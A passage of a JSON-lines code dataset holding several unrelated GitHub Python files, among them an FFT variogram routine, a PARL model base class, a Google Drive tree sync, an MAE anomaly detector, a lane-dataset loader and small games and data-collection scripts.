image\n\n gmap12 : numpy array\n the crossvariogram map for the pair of images\n\n nbpair1 : numpy array\n the number of pairs for gmap1\n\n nbpair2 : numpy array\n the number of pairs for gmap2\n\n nbpair12 : numpy array\n the number of pairs for gmap12\n\n\n Examples\n --------\n\n >>> gmap1, gmap2, gmap12, npair1, npair2, npair12 = fftvariogram(image)\n\n Method\n -------\n\n Since the computation of a variogram map requires to compute\n convolution products, it can be accelerated using Fast Fourier Transform.\n The method was proposed by:\n\n Marcotte (1996) Fast Variogram Computation with FFT, Computers and\n Geosciences, 22(10): 1175-1186\n\n This approach is faster than the tradional spatial shift method\n when the size of the image is large enough.\n\n \"\"\"\n\n # Transform the input into a numpy array\n if isinstance(input_image1, mpsimg.Image):\n input_image1 = input_image1.asArray()\n\n # Copy input in array z\n z = input_image1.copy()\n\n # Transform the input into a numpy array\n if isinstance(input_image2, mpsimg.Image):\n input_image2 = input_image2.asArray()\n\n # Copy input in array z\n y = input_image2.copy()\n\n # Image size\n nr = z.shape[0]\n nc = z.shape[1]\n\n if len(z.shape) > 2:\n tmp = z.shape[2]\n if tmp > 1:\n raise ValueError('the input image must be 2D')\n\n # Ensure proper size before running FFT\n z.shape = (nr, nc,)\n y.shape = (nr, nc,)\n\n # Variogram map size\n nr2 = 2*nr-1\n nc2 = 2*nc-1\n\n # Find the closest multiple of 8\n nr8 = int(np.ceil(nr2 / 8) * 8)\n nc8 = int(np.ceil(nc2 / 8) * 8)\n\n # Construct matrix of 1 for known values and 0 for missing ones\n idz, z = buildindicator_(z)\n idy, y = buildindicator_(y)\n\n # Fourrier transforms\n z1f = np.fft.fft2(z, (nr8, nc8))\n z2f = np.fft.fft2(z * z, (nr8, nc8))\n izf = np.fft.fft2(idz, (nr8, nc8))\n\n y1f = np.fft.fft2(y, (nr8, nc8))\n y2f = np.fft.fft2(y * y, (nr8, nc8))\n iyf = np.fft.fft2(idy, (nr8, nc8))\n\n # cross-components\n izyf = np.fft.fft2(idz * idy, (nr8, nc8))\n t1 = np.fft.fft2(z * idy, (nr8, nc8))\n t2 = np.fft.fft2(y * idz, (nr8, nc8))\n t12 = np.fft.fft2(z * y, (nr8, nc8))\n\n # Number of pairs\n npairz = np.round(np.real(np.fft.ifft2(izf.conjugate() * izf)))\n npairz = np.maximum(npairz, 1) # To avoid division by zero\n\n npairy = np.round(np.real(np.fft.ifft2(iyf.conjugate() * iyf)))\n npairy = np.maximum(npairy, 1)\n\n npairzy = np.round(np.real(np.fft.ifft2(izyf.conjugate() * izyf)))\n npairzy = np.maximum(npairzy, 1)\n\n # Assemble the variogram computation\n tmp = izf.conjugate() * z2f + z2f.conjugate() * izf\n tmp -= 2 * z1f.conjugate() * z1f\n gz = 0.5 * np.real(np.fft.ifft2(tmp)) / npairz\n\n tmp = iyf.conjugate() * y2f + y2f.conjugate() * iyf\n tmp -= 2 * y1f.conjugate() * y1f\n gy = 0.5 * np.real(np.fft.ifft2(tmp)) / npairy\n\n tmp = izyf.conjugate() * t12 + t12.conjugate() * izyf\n tmp -= t1.conjugate() * t2 + t2.conjugate() * t1\n gzy = 0.5 * np.real(np.fft.ifft2(tmp)) / npairzy\n\n # Shift the matrices for readability\n npairz = reduce_matrix_(npairz, nr, nc, nr2, nc2, nr8, nc8)\n npairy = reduce_matrix_(npairy, nr, nc, nr2, nc2, nr8, nc8)\n npairzy = reduce_matrix_(npairzy, nr, nc, nr2, nc2, nr8, nc8)\n gz = reduce_matrix_(gz, nr, nc, nr2, nc2, nr8, nc8)\n gy = reduce_matrix_(gy, nr, nc, nr2, nc2, nr8, nc8)\n gzy = reduce_matrix_(gzy, nr, nc, nr2, nc2, nr8, nc8)\n\n return gz, gy, gzy, npairz, npairy, npairzy\n","repo_name":"UniNE-CHYN/mps_toolbox","sub_path":"mpstool/variogram.py","file_name":"variogram.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"1683742196","text":"import paddle\nimport paddle.nn as nn\nimport collections\nimport numpy as np\n\nfrom parl.core.model_base import ModelBase\nfrom parl.utils import machine_info\n\n__all__ = ['Model']\n\n\nclass Model(nn.Layer, ModelBase):\n \"\"\"\n | `alias`: ``parl.Model``\n | `alias`: ``parl.core.paddle.agent.Model``\n\n | ``Model`` is a base class of PARL for the neural network. \n A ``Model`` is usually a policy or Q-value function, which predicts \n an action or an estimate according to the environmental observation.\n\n | To use the ``PaddlePaddle2.0`` backend model, user needs to call \n ``super(Model, self).__init__()`` at the beginning of ``__init__`` \n function.\n\n | ``Model`` supports duplicating a ``Model`` instance in a pythonic way:\n\n | ``copied_model = copy.deepcopy(model)``\n\n Example:\n\n .. code-block:: python\n\n import parl\n import paddle.nn as nn\n\n class Policy(parl.Model):\n def __init__(self):\n super(Policy, self).__init__()\n self.fc = nn.Linear(input_dim=100, output_dim=32)\n\n def policy(self, obs):\n out = self.fc(obs)\n return out\n \n policy = Policy() \n copied_policy = copy.deepcopy(policy)\n\n Attributes:\n model_id(str): each model instance has its unique model_id.\n\n Public Functions:\n - ``sync_weights_to``: synchronize parameters of the current model \n to another model.\n - ``get_weights``: return a list containing all the parameters of \n the current model.\n - ``set_weights``: copy parameters from ``set_weights()`` to the model.\n - ``forward``: define the computations of a neural network. **Should** \n be overridden by all subclasses.\n \"\"\"\n\n def __init___(self):\n super(Model, self).__init__()\n\n def sync_weights_to(self, target_model, decay=0.0):\n \"\"\"Synchronize parameters of current model to another model.\n\n target_model_weights = decay * target_model_weights \n + (1 - decay) * current_model_weights\n\n Args:\n target_model (`parl.Model`): an instance of ``Model`` that has \n the same neural network architecture as the current model.\n decay (float): the rate of decline in copying parameters. \n 0 if no parameters decay when synchronizing the parameters.\n\n Example:\n\n .. code-block:: python\n\n import copy\n # create a model that has the same neural network structures.\n target_model = copy.deepcopy(model)\n\n # after initilizing the parameters ...\n model.sync_weights_to(target_mdodel)\n\n Note:\n Before calling ``sync_weights_to``, parameters of the model must \n have been initialized.\n \"\"\"\n assert not target_model is self, \"cannot copy between identical model\"\n assert isinstance(target_model, Model)\n assert self.__class__.__name__ == target_model.__class__.__name__, \\\n \"must be the same class for params syncing!\"\n assert (decay >= 0 and decay <= 1)\n\n target_vars = dict(target_model.named_parameters())\n for name, var in self.named_parameters():\n target_data = decay * target_vars[name] + (1 - decay) * var\n target_vars[name] = target_data\n target_model.set_state_dict(target_vars)\n\n def get_weights(self):\n \"\"\"Returns a Python dict containing parameters of current model.\n\n Returns: \n a Python dict containing the parameters of current model.\n \"\"\"\n weights = self.state_dict()\n for key in weights.keys():\n weights[key] = weights[key].numpy()\n return weights\n\n def set_weights(self, weights):\n \"\"\"Copy parameters from ``set_weights()`` to the model.\n \n Args:\n weights (dict): a Python dict containing the parameters.\n \"\"\"\n old_weights = self.state_dict()\n assert len(old_weights) == len(\n weights), '{} params are expected, but got {}'.format(\n len(old_weights), len(weights))\n new_weights = collections.OrderedDict()\n for key in old_weights.keys():\n assert key in weights, 'key: {} is expected to be in weights.'.format(\n key)\n assert old_weights[key].shape == list(\n weights[key].shape\n ), 'key \\'{}\\' expects the data with shape {}, but gets {}'.format(\n key, old_weights[key].shape, list(weights[key].shape))\n new_weights[key] = paddle.to_tensor(weights[key])\n self.set_state_dict(new_weights)\n","repo_name":"PaddlePaddle/PARL","sub_path":"parl/core/paddle/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":3097,"dataset":"github-code","pt":"50"} +{"seq_id":"2833569246","text":"class Solution(object):\n def __init__(self):\n self.table = (\n ('I', 1),\n ('IV', 4), ('V', 5),\n ('IX', 9), ('X', 10),\n ('XL', 40), ('L', 50),\n ('XC', 90), ('C', 100),\n ('CD', 400), ('D', 500),\n ('CM', 900), ('M', 1000)\n )\n\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n r = ''\n i = len(self.table) - 1\n while i >= 0:\n (k, v) = self.table[i]\n while num >= v:\n num -= v\n r += k\n i -= 1\n\n return r\n\n\nif __name__ == '__main__':\n solution = Solution()\n # example 1\n # num = 9\n # example 2\n # \"LVIII\"\n # num = 58\n # example 3\n # \"MCMXCIV\"\n num = 1994\n s = solution.intToRoman(num)\n print(s)\n","repo_name":"yimtcode/LeetCode","sub_path":"algorithms/python/0012_integer-to-roman.py","file_name":"0012_integer-to-roman.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"756620251","text":"import os\nimport pickle\n\nfrom mime_names import TYPES\nfrom utils import load_settings\n\nfrom drive_file import DriveFile\n\nclass DriveTree:\n def __init__(self, service, save_path, root):\n self.save_path = save_path\n if service is None:\n return\n self.root = DriveFile(None, root)\n self.service = service\n self.folders_hash = {}\n self.files_hash = {}\n\n def download(self, destination):\n '''Download all the files from the tree'''\n if not os.path.exists(destination):\n os.mkdir(destination)\n nodes = self.get_root().get_children()\n while nodes:\n node = nodes.pop(0)\n nodes = nodes + node.get_children()\n node.download(destination, self.service, recursive=False)\n\n def find_file(self, node_id):\n if node_id == self.root.get_id():\n return self.root\n return self.find_file_in_parent(self.root, node_id, recursive=True)\n\n def find_file_in_parent(self, parent, node_id, recursive=False):\n for child in parent.get_children():\n if child.get_id() == node_id:\n return child\n\n if recursive and child.get_children():\n ret = self.find_file_in_parent(child, node_id, True)\n if ret and ret.get_id() == node_id:\n return ret\n return None\n\n def get_node_from_id(self, fileId):\n if fileId in self.folders_hash:\n return self.folders_hash[fileId]\n return None\n\n def get_file_count(self):\n return (len(self.files_hash) + len(self.folders_hash))\n\n def get_closest_nodes_from_path(self, path):\n '''Returns a list of all the nodes that are close to the path,\n of the local existing tree. It's a list because it's possible\n to have more than one file with the same name under the same\n parent, as it's not possible to distinguish them by using a\n path string.\n '''\n if path in ['root', '/root', '/root/', 'root/', '/']:\n return [self.root], ''\n path_list = [p for p in path.split('/') if p]\n current_nodes = [self.root]\n depth = 0\n for path1 in path_list:\n last_depth = depth\n for node in list(current_nodes):\n for child in node.get_children():\n if path1 == child.get_name():\n current_nodes.append(child)\n if depth == last_depth:\n depth += 1\n current_nodes.remove(node)\n if depth == last_depth:\n break\n if not current_nodes:\n current_nodes = [self.root]\n return current_nodes, '/'.join(path_list[depth:])\n\n def get_nodes_from_path(self, path, exclusive=True):\n '''It will return a list of nodes that fits the path. If exclusive is false,\n all of the files that are in the same parent will be added to the tree.\n '''\n closest_nodes, remaining_path = self.get_closest_nodes_from_path(path)\n if remaining_path:\n path_list = [p for p in remaining_path.split('/') if p]\n fields = 'files(name, id, mimeType, parents)'\n for p in path_list:\n for node in list(closest_nodes):\n file_list = self.service.files().list(q=\"'%s' in parents and trashed = false\"\n % node.get_id(),\n fields=fields)\\\n .execute().get('files', [])\n for file1 in file_list:\n if file1['name'] == p:\n closest_nodes.append(DriveFile(node, file1))\n elif not exclusive\\\n and not self.find_file_in_parent(node, file1['id']):\n DriveFile(node, file1)\n closest_nodes.remove(node)\n if not closest_nodes:\n return None\n self.save_to_file()\n return closest_nodes\n\n def get_path_from_id(self, fileId):\n file1 = self.service.files().get(fileId=fileId,\n fields='name, mimeType, parents').execute()\n isfolder = ''\n if file1['mimeType'] == TYPES['folder']:\n isfolder = '/'\n if not 'parents' in file1:\n return '?' + file1['name']\n parent = file1['parents'][0]\n if parent == self.root.get_id():\n return '/' + file1['name'] + isfolder\n\n return self.get_path_from_id(parent) + file1['name'] + isfolder\n\n def get_root(self):\n return self.root\n\n def load_complete_tree(self, filter_enabled=True, complete=True):\n '''Creates a folder hash table and another non-folder hash table\n stores nodes in the first hash and the id is the key (e.g. /MyDrive/Books/Fiction)\n the second one simply stores the file struct and the id is the\n key (e.g. Star Wars.pdf).\n\n :param filter_enabled: if whitelist or blacklist is enabled.\n :type filter_enabled: bool.\n :param complete: If will link files to tree.\n :type complete: bool.\n '''\n whitelist = blacklist = None\n if filter_enabled:\n settings = load_settings()\n if settings['whitelist-enabled']:\n whitelist = settings['whitelist-files']\n elif settings['blacklist-enabled']:\n blacklist = settings['blacklist-files']\n\n # =========== debug code ===========\n # just to keep local query to not request files every run\n # if not os.path.exists('folders.dat'):\n # query = 'trashed = false and mimeType = \"%s\"' % TYPES['folder']\n # fields = 'nextPageToken, files(name, id, parents, mimeType, md5Checksum)'\n # folders_metadata = []\n # pageToken = None\n # while True:\n # result = self.service.files().list(q=query,\\\n # fields=fields,\\\n # pageToken=pageToken,\\\n # pageSize=1000).execute()\n # folders_metadata += result.get('files', [])\n # pageToken = result.get('nextPageToken')\n # if not pageToken:\n # break\n # with open('folders.dat', 'wb') as f:\n # pickle.dump(folders_metadata, f, pickle.HIGHEST_PROTOCOL)\n # else:\n # with open('folders.dat', 'rb') as f:\n # folders_metadata = pickle.load(f)\n # =========== debug code ===========\n\n # =========== real code ===========\n query = 'trashed = false and mimeType = \"%s\"' % TYPES['folder']\n folders_metadata = []\n pageToken = None\n while True:\n fields = 'nextPageToken, files(name, id, parents, mimeType, md5Checksum)'\n result = self.service.files().list(q=query,\\\n fields=fields,\\\n pageToken=pageToken,\\\n pageSize=1000).execute()\n folders_metadata += result.get('files', [])\n pageToken = result.get('nextPageToken')\n if not pageToken:\n break\n # =========== real code ===========\n # just the folders vector, will be converted to hash bellow\n folders = [f for f in folders_metadata\\\n if 'parents' in f]\n self.root.children = [] # empty tree\n stack = [] # [metadata]\n self.folders_hash = {}\n i = 0 # used to pin the node that is looking for a parent\n j = 0 # used to pin the next node that will look for the parent\n while folders or stack:\n enqueue = None\n j = 0\n for folder in folders:\n if folders[i]['parents'][0] == folder['id']:\n enqueue = folders[i]\n break\n j += 1\n\n if enqueue:\n stack.append(enqueue)\n folders.pop(i)\n if j < i:\n i = j\n else:\n i = j - 1\n elif folders[i]['parents'][0] == self.root.get_id():\n title = ('/' + folders[i]['name'] + '/')\n if (blacklist and title in blacklist)\\\n or (whitelist and not any(title in elem for elem in whitelist)):\n stack = []\n folders.pop(i)\n i = 0\n continue\n child = DriveFile(self.root, folders[i])\n self.folders_hash[folders[i]['id']] = child\n\n while stack:\n item = stack.pop()\n title = title + '/' + item['name'] + '/'\n if (blacklist and (title in blacklist)) \\\n or (whitelist and not \\\n any(elem in title for elem in whitelist)):\n stack = []\n break\n parent = child\n child = DriveFile(parent, item)\n self.folders_hash[item['id']] = child\n folders.pop(i)\n i = 0\n else:\n parent_id = folders[i]['parents'][0]\n if not parent_id in self.folders_hash:\n stack = []\n folders.pop(i)\n i = 0\n continue\n elif filter_enabled:\n title = self.folders_hash[parent_id].get_path() + folders[i]['name'] + '/'\n if (blacklist and (title in blacklist))\\\n or (whitelist and not\\\n any(elem in title for elem in whitelist)):\n stack = []\n folders.pop(i)\n i = 0\n continue\n\n child = DriveFile(self.folders_hash[parent_id], folders[i])\n self.folders_hash[child.get_id()] = child\n while stack:\n parent = child\n item = stack.pop()\n if (blacklist and (title in blacklist))\\\n or (whitelist and not \\\n any(elem in title for elem in whitelist)):\n stack = []\n break\n child = DriveFile(parent, item)\n self.folders_hash[item['id']] = child\n folders.pop(i)\n i = 0\n if complete:\n if self.folders_hash:\n parents_query = ['mimeType != \\'%s\\' and (\"%s\" in parents'\n % (TYPES['folder'], list(self.folders_hash)[0])]\n i = 0 # counter\n j = 0 # index of the list\n for item in list(self.folders_hash)[1:]:\n adding = '\"%s\" in parents' % item\n # 30000 is the max body size before too complex query\n if len(' or ' + parents_query[j]) >= 25000:\n parents_query[j] += ')'\n j += 1\n i = 0\n parents_query.append('mimeType != \\'%s\\' and (\"%s\" in parents'\n % (TYPES['folder'], item))\n continue\n parents_query[j] += ' or ' + adding\n i += 1\n parents_query[j] += ')'\n else:\n print('no folders found')\n return()\n fields = 'nextPageToken, files(name, id, parents, mimeType, md5Checksum)'\n pageTokens = [None] * len(parents_query)\n files_metadata = []\n while True:\n for i, query in enumerate(parents_query):\n if pageTokens[i] != '0':\n result = self.service.files().list(q=query,\\\n fields=fields,\\\n pageToken=pageTokens[i],\\\n pageSize=1000).execute()\n files_metadata += result.get('files', [])\n pageTokens[i] = result.get('nextPageToken')\n if not pageTokens[i]:\n pageTokens[i] = '0'\n if all(token == '0' for token in pageTokens):\n break\n\n for metadata in files_metadata:\n if not metadata['parents'][0] == self.root.get_id():\n parent = self.folders_hash[metadata['parents'][0]]\n else:\n if filter_enabled:\n continue\n parent = self.root\n self.files_hash[metadata['id']] = DriveFile(parent, metadata)\n\n def load_from_file(self, file_path=None):\n '''Loads the tree from disk'''\n if not file_path:\n file_path = self.save_path\n\n if os.path.exists(file_path) and os.path.isfile(file_path):\n with open(file_path, 'rb') as f:\n return pickle.load(f)\n return self\n\n def print_folder(self, folder, level=0, depth=None):\n '''Prints the folder recusrively'''\n if depth and level == depth:\n return\n prefix = level * (' |') + '--'\n sequence = ''\n if folder.get_sequence():\n sequence = ' (' + str(folder.get_sequence()) + ')'\n print(prefix, folder.get_name(), sequence, '\\tid:', folder.get_id(), sep='')\n for child in folder.get_children():\n self.print_folder(child, level=level+1, depth=depth)\n\n def print_tree(self):\n self.print_folder(self.root)\n\n def remove_folder(self, id):\n folder = self.find_file(id)\n if folder:\n folder.get_parent.removeChildren(folder)\n\n def save_to_file(self, file_path=None):\n '''Saves the tree to disk'''\n if not file_path:\n file_path = self.save_path\n if not os.path.exists(os.path.split(os.path.abspath(file_path))[0]):\n os.makedirs(os.path.split(os.path.abspath(file_path))[0])\n\n with open(file_path, 'wb') as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n f.flush()\n","repo_name":"lucasjrt/JRTDriveSync","sub_path":"drive_tree.py","file_name":"drive_tree.py","file_ext":"py","file_size_in_byte":14578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24390430355","text":"import os\nfrom types import MethodType\nfrom PIL import Image\nimport numpy as np\nimport time\n\nfrom mae_visualize_modified import (\n imagenet_normalize,\n per_patch_loss,\n masking_from_mask,\n patchify_mask,\n prepare_model,\n prepare_model_dummy,\n run_one_image,\n)\n\n# if you need to access a file next to the source code, use the variable ROOT\n# for example:\n# torch.load(os.path.join(ROOT, 'weights.pth'))\nROOT = os.path.dirname(os.path.realpath(__file__))\n\n\ndef minmaxnorm(x):\n return (x - x.min()) / (x.max() - x.min())\n\n\ndef tic_tac_toe_masks():\n mask0, mask1, mask2, mask3 = np.zeros((4, 224, 224, 1))\n for i in range(14):\n for j in range(14):\n if i % 2 == 0 and j % 2 == 0:\n mask0[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 0 and j % 2 == 1:\n mask1[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 1 and j % 2 == 0:\n mask2[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n elif i % 2 == 1 and j % 2 == 1:\n mask3[i * 16 : (i + 1) * 16, j * 16 : (j + 1) * 16, 0] = 1\n return mask0, mask1, mask2, mask3\n\n\ndef detect_anomaly(img_path, loss):\n \"\"\"Detects anomalies by measuring the difference between the original and reconstructed image.\"\"\"\n img, size = load_img(img_path)\n tictactoemasks = tic_tac_toe_masks()\n model_mae = get_model_mae(loss)\n reconstruction, losses = [], []\n for i, mask in enumerate(tictactoemasks):\n (\n original,\n masked,\n reconstruction_m,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n ) = reconstruct_mask(img, mask, model_mae, size)\n reconstruction.append(reconstruction_m * mask)\n losses.append((loss_per_patch * vector_mask).detach().numpy())\n reconstruction = np.array(reconstruction).sum(0)\n losses = np.array(losses).sum(0).reshape(14, 14)\n return original, reconstruction, losses, size\n\n\ndef load_img(img_path):\n img = Image.open(img_path).convert(\"RGB\")\n size = img.size\n img = np.array(img.resize((224, 224))) / 255.0\n assert img.shape == (\n 224,\n 224,\n 3,\n ), f\"Expected image to be (224, 224, 3) instead of {img.shape}\"\n img = imagenet_normalize(img)\n return img, size\n\n\ndef load_mask(mask_path):\n mask = (\n np.array(Image.open(mask_path).resize((224, 224), Image.NEAREST))[\n ..., -1\n ]\n > 0\n ).astype(bool)[..., None]\n assert mask.shape == (\n 224,\n 224,\n 1,\n ), f\"Expected mask to be (224, 224, 1) instead of {mask.shape}\"\n return mask\n\n\ndef reconstruct_mask0(img_path, loss):\n \"\"\"Runs MAE model with given loss over `input` image using `mask_0.png` as the part to ignore.\"\"\"\n img, size = load_img(img_path)\n mask = load_mask(os.path.join(ROOT, \"mask_0.png\"))\n model_mae = get_model_mae(loss)\n return reconstruct_mask(img, mask, model_mae, size)\n\n\ndef get_model_mae(loss):\n st = time.time()\n mse_ckpt = os.path.join(ROOT, \"mae_visualize_vit_large.pth\")\n gan_ckpt = os.path.join(ROOT, \"mae_visualize_vit_large_ganloss.pth\")\n if loss == \"MSE\" and os.path.exists(mse_ckpt):\n model_mae = prepare_model(mse_ckpt, \"mae_vit_large_patch16\")\n elif loss == \"GAN\" and os.path.exists(gan_ckpt):\n model_mae = prepare_model(gan_ckpt, \"mae_vit_large_patch16\")\n else:\n print(\"No model found for loss type \" + loss)\n print(f\"Directory contains: {os.listdir(ROOT)}\")\n print(\"Loading model with random weights\")\n model_mae = prepare_model_dummy(\"mae_vit_large_patch16\")\n\n model_mae.patchify_mask = MethodType(patchify_mask, model_mae)\n model_mae.random_masking = MethodType(masking_from_mask, model_mae)\n model_mae.forward_loss = MethodType(per_patch_loss, model_mae)\n print(f\"Model loaded in {time.time()-st}s.\")\n return model_mae\n\n\ndef reconstruct_mask(img, mask, model_mae, size):\n st = time.time()\n (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n loss_per_patch,\n vector_mask,\n ) = run_one_image(img, mask, model_mae)\n print(\"Reconstruction done in \" + str(time.time() - st) + \"s.\")\n return (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n )\n\n\ndef save_outputs(size, **kwargs):\n for k, v in kwargs.items():\n Image.fromarray(v).resize(size).save(f\"{k}.png\")\n Image.fromarray(v).save(f\"{k}rs.png\")\n\n\ndef main_reconstruct(img_path, loss):\n\n (\n original,\n masked,\n reconstruction,\n reconstructionplusvisible,\n size,\n loss_per_patch,\n vector_mask,\n ) = reconstruct_mask0(img_path, loss)\n save_outputs(\n size=size,\n original=original,\n masked=masked,\n reconstruction=reconstruction,\n reconstructionplusvisible=reconstructionplusvisible,\n )\n\n\ndef main_anomaly(img_path, loss):\n original, reconstruction, losses, size = detect_anomaly(img_path, loss)\n save_outputs(\n size=size,\n original=original,\n reconstruction=reconstruction.astype(np.uint8),\n error=(minmaxnorm(losses) * 255).astype(np.uint8),\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input\", type=str, required=True)\n parser.add_argument(\"--loss\", type=str, required=True)\n\n args = parser.parse_args()\n main_anomaly(args.input, args.loss)\n","repo_name":"franchesoni/mae_anomaly_detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"12702006411","text":"#!/usr/bin/env python\n# coding: utf-8\n# @author: Zhijian Qiao\n# @email: zqiaoac@connect.ust.hk\n\nimport os\nimport cv2\nimport numpy as np\nimport json\nimport glob\nfrom misc.config import cfg\n\n\nclass OpenLane:\n\n def __init__(self, args, segment, dataset = None):\n self.dataset = dataset\n self.data_dir = cfg.dataset.label_dir\n self.dataset_dir = cfg.dataset.image_dir\n self.segment = segment\n self.timestamp_micros_list = self.load_data()\n\n def load_data(self):\n segment_dir = os.path.join(self.data_dir, 'training', self.segment)\n json_files = sorted(glob.glob(os.path.join(segment_dir, '*.json')))\n timestamp_micros_list = [int(os.path.basename(json_file).replace('00.json', '.json').split('.')[0]) for json_file in json_files]\n return timestamp_micros_list\n\n def __len__(self):\n return len(self.timestamp_micros_list)\n\n def fetch_gt_data(self, timestamp_micros, return_image = False):\n gt_json = os.path.join(self.data_dir, 'training', self.segment, '{:<018}.json'.format(timestamp_micros))\n with open(gt_json, 'r') as fp:\n gt_dict = json.load(fp)\n\n if return_image:\n image_path = os.path.join(self.dataset_dir, gt_dict['file_path'])\n img = cv2.imread(image_path)\n else:\n img = None\n\n vehicle_pose = np.array(gt_dict['pose'])\n ex0 = np.array(gt_dict['extrinsic'])\n cam0_pose = vehicle_pose @ ex0\n\n lane_all = []\n for lane in gt_dict['lane_lines']:\n xyz = np.asarray(lane['xyz']).reshape(3, -1).T\n if xyz.shape[0] == 0:\n continue\n category = np.asarray(lane['category']).reshape(-1, 1).repeat(xyz.shape[0], axis=0)\n visibility = np.asarray(lane['visibility']).reshape(-1, 1)\n track_id = np.asarray(lane['track_id']).reshape(-1, 1).repeat(xyz.shape[0], axis=0)\n points = np.concatenate([xyz, category, visibility, track_id], axis=1)\n lane_all.append(points)\n\n if len(lane_all) > 0:\n lane_points = np.vstack(lane_all)\n else:\n lane_points = None\n\n return img, lane_points, cam0_pose\n\n def fetch_data(self, timestamp):\n idx_json_file = os.path.join(self.data_dir, 'training', self.segment, '{:<018}.json'.format(timestamp))\n idx = self.dataset._label_list.index(idx_json_file)\n\n idx_json_file, image, seg_label, gt_anchor, gt_laneline_img, idx, gt_cam_height, \\\n gt_cam_pitch, intrinsics, extrinsics, aug_mat, seg_name, seg_bev_map = self.dataset.WIP__getitem__(idx)\n\n data_dict = {\n 'idx_json_file': idx_json_file,\n 'image': image.unsqueeze(0),\n 'seg_label': seg_label.unsqueeze(0),\n 'gt_anchor': gt_anchor.unsqueeze(0),\n 'gt_laneline_img': gt_laneline_img.unsqueeze(0),\n 'idx': idx,\n 'gt_cam_height': gt_cam_height.unsqueeze(0),\n 'gt_cam_pitch': gt_cam_pitch.unsqueeze(0),\n 'intrinsics': intrinsics.unsqueeze(0),\n 'extrinsics': extrinsics.unsqueeze(0),\n 'aug_mat': aug_mat.unsqueeze(0),\n 'seg_name': seg_name,\n 'seg_bev_map': seg_bev_map.unsqueeze(0)\n }\n\n return data_dict","repo_name":"HKUST-Aerial-Robotics/MonoLaneMapping","sub_path":"lane_slam/openlane.py","file_name":"openlane.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"50"} +{"seq_id":"39855329092","text":"import random\r\n\r\nclass Hangman:\r\n def __init__(self, word):\r\n self.word = word\r\n self.possible_words = ['becode', 'learning', 'mathematics', 'sessions', 'just', 'trust', 'pedagogy']\r\n self.word_to_find = []\r\n self.lives = 5\r\n self.correctly_guessed_letters=[]\r\n self.wrongly_guessed_letters = []\r\n self.turn_count=[0]\r\n self.error_count=[0]\r\n\r\n\r\n def play (self):\r\n letter=input('please enter a letter')\r\n if letter in self.word_to_find:\r\n for index, l in enumerate(self.word_to_find):\r\n if l ==letter:\r\n self.correctly_guessed_letters[index]=letter\r\n print(self.correctly_guessed_letters)\r\n self.turn_count+=1\r\n else:\r\n self.wrongly_guessed_letters.append(letter)\r\n self.error_count += 1\r\n self.lives -= 1\r\n self.turn_count += 1\r\n\r\n def start_game(self):\r\n word = random.choice(self.possible_words)\r\n self.word_to_find=list(word)\r\n while True:\r\n self.play()\r\n if self.lives ==0:\r\n self.game_over()\r\n break\r\n if self.word_to_find ==self.correctly_guessed_letters:\r\n self.well_played()\r\n break\r\n\r\n def game_over(self):\r\n print(\"Gameover\")\r\n\r\n def well_played(self):\r\n print(f\"You found the word: {self.word_to_find} in {self.turn_count} turns with {self.error_count} errors!\")\r\n\r\n\r\n","repo_name":"Helabrak/Hangman","sub_path":"Hangman/utils/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5057731224","text":"import numpy as np\r\nfrom grabscreen import grab_screen\r\nimport cv2\r\nimport time\r\nfrom getkeys import key_check\r\nimport os\r\n\r\ndef keys_to_output(keys):\r\n output = [0,0,0]\r\n if 'A' in keys:\r\n output[0] = 1\r\n elif 'D' in keys:\r\n output[2] = 1 \r\n elif 'W' in keys:\r\n output[1] = 1\r\n return output\r\n\r\n\r\nfile_name = 'training_data.npy'\r\n\r\nif os.path.isfile(file_name):\r\n print('File exist , loading previous data')\r\n training_data = list(np.load(file_name))\r\nelse:\r\n print('creating new')\r\n training_data = []\r\n\r\ndef main():\r\n for i in list(range(4)):\r\n print(i+1)\r\n time.sleep(1)\r\n while(True):\r\n screen = grab_screen(region = (0,40,800,640))\r\n lasttime = time.time()\r\n screen = cv2.cvtColor(screen , cv2.COLOR_BGR2GRAY)\r\n screen = cv2.resize(screen , (224,224))\r\n keys = key_check()\r\n output = keys_to_output(keys)\r\n training_data.append([screen,output])\r\n\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cv2.destroyAllWindows()\r\n break\r\n if len(training_data)%500 ==0:\r\n print(len(training_data))\r\n np.save(file_name,training_data)\r\n\r\n\r\nmain()\r\n","repo_name":"satyadwyoom/gta-san-andreas","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73448251036","text":"from __future__ import absolute_import\n\nimport arrow\nimport pytest\n\nfrom libweasyl import ratings\nfrom libweasyl.models.helpers import CharSettings\nfrom weasyl.test import db_utils\n\n\n@pytest.fixture(name='journal_user')\n@pytest.mark.usefixtures('db')\ndef _journal_user():\n return 